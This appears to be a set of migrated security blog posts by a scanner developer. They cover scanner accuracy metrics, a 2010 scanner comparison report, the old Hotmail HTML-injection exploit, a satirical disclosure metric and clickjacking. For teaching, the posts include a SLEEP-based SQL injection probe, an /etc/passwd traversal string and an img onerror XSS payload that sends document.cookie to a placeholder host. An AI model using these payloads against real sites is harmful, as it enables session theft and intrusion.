Over the next month I will be moving posts from [the old site] to this site, which is why you might notice “new” posts appearing with dates from the past.
This is the first in a series of essays describing suggested metrics for evaluating web application security scanners.
Accuracy measures the scanner’s ability to detect vulnerabilities. The basic function of a web scanner is to use automation to identify the same, or most of the same, vulnerabilities as a web security auditor. Rather than focus on the intricate details of specific vulnerabilities, this essay describes two major areas of evaluation for a scanner: its precision and faults.
Scanner tests draw on several detection techniques:
- Encoding and obfuscation (e.g. employing various character sets or encoding techniques to bypass possible filters)
- Applicability to different technologies in a web platform (e.g. PHP superglobals, .NET VIEWSTATE)
- Signatures such as HTTP response code, string patterns, and reflected content (e.g. matching ODBC errors or looking for alert(1) strings)
- Inference based on interpreting the results of a group of requests (e.g. “blind” SQL injection that affects the content of a response based on specific SQL query constructions)
- Time-based tests measure the responsiveness of the web site to various payloads. Not only can they extend inference-based tests, but they can also indicate potential areas of Denial of Service if a payload can cause the site to spend more resources processing a request than the attacker spends making it (e.g. a query that performs a complete table scan of a database).
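The time-based approach can be sketched in a few lines. This is an illustrative assumption, not any particular scanner's implementation; the payload string, threshold, and request interface are all hypothetical:

```python
import time

# Hypothetical sketch of time-based inference: if a payload that should
# force the backend to sleep makes the response measurably slower than a
# harmless baseline request, the parameter is flagged for review.
SLEEP_PAYLOAD = "' AND SLEEP(5)-- "  # assumed MySQL-style payload

def looks_time_vulnerable(send_request, baseline_value, threshold=4.0):
    """Return True if the sleep payload delays the response well beyond
    a harmless baseline; send_request(value) issues one request."""
    start = time.monotonic()
    send_request(baseline_value)
    baseline = time.monotonic() - start

    start = time.monotonic()
    send_request(SLEEP_PAYLOAD)
    delayed = time.monotonic() - start

    return (delayed - baseline) > threshold
```

A real scanner would repeat the measurement to smooth out network jitter; a single slow response proves very little on its own.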
These tests must be applied to each point where the client can deliver data to the application:
- URI parameters
- POST data
- Client-side headers, especially those commonly interpreted by web sites, including User-Agent, the forever-misspelled Referer, and Cookie.
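Fanning one payload out across these injection points can be sketched as follows. The function name and request structure are illustrative assumptions, not a real scanner's API:

```python
# Hypothetical sketch: generate one test request per injection point for
# a single payload. Each entry describes a request to be sent later.
def build_test_requests(url, params, post_data, payload):
    requests_to_send = []
    # URI parameters: replace each query parameter in turn
    for name in params:
        mutated = dict(params)
        mutated[name] = payload
        requests_to_send.append({"url": url, "params": mutated,
                                 "data": dict(post_data), "headers": {}})
    # POST data: replace each form field in turn
    for name in post_data:
        mutated = dict(post_data)
        mutated[name] = payload
        requests_to_send.append({"url": url, "params": dict(params),
                                 "data": mutated, "headers": {}})
    # Client-side headers commonly interpreted by web sites
    for header in ("User-Agent", "Referer", "Cookie"):
        requests_to_send.append({"url": url, "params": dict(params),
                                 "data": dict(post_data),
                                 "headers": {header: payload}})
    return requests_to_send
```

Note that each request mutates exactly one field; injecting into several at once makes it impossible to tell which one triggered a reaction.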
False positives (reporting a vulnerability where none exists) stem from several sources:
- Misdiagnosis of a generic error page or landing page
- Poor test implementation that misinterprets correlated events to infer cause from effect (e.g. changing a profile page’s parameter value from Mike to Mary to view another user’s public information is not a case of account impersonation – the web site intentionally displays the content)
- Sole reliance on inadequate test signature to claim the vulnerability exists (e.g. a poor regex or stating an HTTP 200 response code for ../../../../etc/passwd indicates the password file is accessible)
- Web application goes into error state due to load (e.g. database error occurs because the server has become overloaded by scan traffic, not because a double quote character was injected into a parameter)
- Lack of security impact (e.g. an unauthenticated, anonymous search form is vulnerable to CSRF – search engines like Google, Yahoo!, and Bing are technically vulnerable but the security relevance is questionable)
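The inadequate-signature failure mode is easy to demonstrate. The regexes and page contents below are illustrative assumptions, not taken from any product:

```python
import re

# Illustrative only: a naive check that trusts HTTP 200 plus a loose
# regex will flag pages that merely *discuss* /etc/passwd.
NAIVE_SIGNATURE = re.compile(r"root:")

def naive_passwd_check(status_code, body):
    return status_code == 200 and bool(NAIVE_SIGNATURE.search(body))

# A stricter signature requires the structural shape of a passwd entry
# (user:pass:uid:gid), which prose quoting the word "root:" won't match.
STRICT_SIGNATURE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)

def strict_passwd_check(status_code, body):
    return status_code == 200 and bool(STRICT_SIGNATURE.search(body))
```

Even the stricter version is only a signature; a careful scanner corroborates it with other evidence before reporting.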
False negatives (missing a vulnerability that does exist) have their own causes:
- Lack of test. The scanner simply does not try to identify the particular type of vulnerability.
- Inadequate signatures (e.g. the scanner does not recognize SQL errors generated by Oracle)
- Insufficient replay of requests (e.g. a form submission requires a valid e-mail address in one field in order to exploit an XSS vulnerability in another field)
- Inability to automate (e.g. the vulnerability is related to a process that requires understanding a sequence of steps or knowledge of the site’s business logic). The topic of vulnerabilities for which scanners cannot test (or have great difficulty testing) will be addressed separately.
- Lack of authentication state (e.g. the scanner is able to authenticate at the beginning of the scan, but unknowingly loses its state, perhaps by hitting a logout link, and does not attempt to restore authentication)
- Link not discovered by the scanner. This falls under the broader scope of site coverage, which will be addressed separately.
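The lost-authentication-state failure above is avoidable if the scanner checks every response for signs of a dropped session. This sketch is a hypothetical illustration; the marker strings and function interfaces are assumptions:

```python
# Hypothetical sketch of guarding authentication state during a scan:
# after each response, look for signs the session was dropped and
# re-authenticate before continuing. Marker strings are illustrative.
LOGGED_OUT_MARKERS = ('name="login"', "Please sign in", "/login?")

def session_lost(response_body):
    return any(marker in response_body for marker in LOGGED_OUT_MARKERS)

def scan_with_session_guard(pages, fetch, login):
    """fetch(page) -> body; login() restores the session."""
    results = {}
    for page in pages:
        body = fetch(page)
        if session_lost(body):
            login()  # restore state instead of scanning logged out
            body = fetch(page)
        results[page] = body
    return results
```

A related precaution is to exclude obvious logout links from the crawl queue in the first place, so the scanner does not terminate its own session.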
Note: I’m the lead developer for the Web Application Scanning service at Qualys, and I worked at NTO for about three years from July 2003 — both tools were included in this February 2010 report by Larry Suto. Nevertheless, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.
The February 2010 report, Analyzing the Accuracy and Time Costs of Web Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engenders some additional questions on the topic of scanners in general:
How much should the ability of the user affect the accuracy of a scan?
Set aside basic requirements to know what a link is or whether a site requires credentials to be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?
I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.
What’s a representative web application?
A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.
Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.
Isn’t gaming a vendor-created web site redundant?
A post on the Acunetix blog accuses NTO of gaming the Acunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Acunetix created their test sites to highlight their scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other web scanner vendors would (or should) do for their own products. There’s nothing wrong with ensuring a scanner — the vendor’s or any other’s — performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.
This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.
What about the time cost of scaling scans?
The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.
Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)
Scaling scans doesn’t just require time to train a tool; it also requires hardware resources to manage configurations, run scans, and centralize reporting. This is where Software as a Service begins to seriously outpace other solutions.
Where’s the analysis of normalized data?
I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.
Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Another step would be to compare false positive/negative rates only for tests scanners actually perform rather than checks a tool doesn’t perform. It’s important to note where a tool does or does not perform a check versus other scanners, but not performing a check reflects differently on accuracy than performing a check that still doesn’t identify a vulnerability.
What’s really going on here?
Designing a web application scanner is easy, implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.
So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful and provide a service to potential customers, who want to find the best scanner for their environment, and useful to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.
The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to the insecurity of unchecked HTML.
The discoverers, in apparent ignorance of the 1990s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further unfamiliarity with disclosure methodologies by omitting greetz, lacking typos, and failing to remind the reader of their near-omnipotent skills — surely an anomaly at the time. The hacker did not fail on all aspects, though. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)
The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.
The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.
The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:
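The original payload isn’t reproduced here, but the general shape of the technique, HTML injected into a viewed message that smuggles in script, looks roughly like this illustrative (not historical) fragment:

```html
<!-- Illustrative only; not the actual "Hot"Mail payload -->
<img src="http://example.invalid/x.gif"
     onerror="document.location='http://example.invalid/collect?c=' + document.cookie">
```

The point is the same then as now: if a site renders unchecked HTML from one user in another user’s browser, the attacker’s markup runs with the victim’s session.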
An opinion piece covering all you ever wanted to know. Maybe not everything, but it provides a basis for the different challenges of automating web attacks. It might even sound familiar from a previous post…
Read a Q&A on some of the fundamental challenges of automating a web application scan. (I wrote the A, not the Q.)
…seven of the most common vulnerabilities that plague web applications.
Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.
The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.
The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.
Resources Expected
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)
Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks
Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)
The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.
Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous
(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)
So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004, Firefox fixed a variant in September 2008), but a refinement of previous exploits and ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to make a respectable type of attack.
Clickjacking tricks a user into clicking on an attacker-supplied page while the user sees only the appearance and effect of clicking on a plain link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame put the target area in the upper left-hand corner of the frame’s visible area. This target IFRAME is visually hidden from the user (though the element remains part of the DOM). The IFRAME is then set within a second page (whose content doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves to stay underneath the mouse. When the user clicks somewhere within the second page, the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.

Essentially, an attacker chooses some web page where a victim’s click on some point (link, button, etc.) would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to click on what appears to be the innocuous page, but is actually an invisible element of the target page that has been automatically, and invisibly, positioned beneath the cursor.

The attack relies on luring a user to a server under the attacker’s control or a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control.
The relative success of phishing implies that securing web applications at the server isn’t the only solution, because users can be tricked into visiting malicious web sites. The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
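One browser-enforced mitigation that emerged after this was written lets a site declare that its pages must not be framed at all, which defeats the hidden-IFRAME overlay for pages that opt in. As a sketch (the middleware shape is an illustration, not a prescription), a server can attach the X-Frame-Options header to every response:

```python
# Illustrative sketch: a minimal WSGI middleware that adds the
# X-Frame-Options header so cooperating browsers refuse to render
# the wrapped application's pages inside a frame.
def deny_framing(app):
    def wrapped(environ, start_response):
        def start(status, headers, exc_info=None):
            headers = list(headers) + [("X-Frame-Options", "DENY")]
            return start_response(status, headers, exc_info)
        return app(environ, start)
    return wrapped
```

The trade-off matches the concern above: DENY also breaks legitimate framing, so sites that rely on frames must use a less restrictive policy.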
In 1998, L0pht claimed before Congress that in under 30 minutes their seven member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites — if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)
This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008 prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability information with the speculation usually retained for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]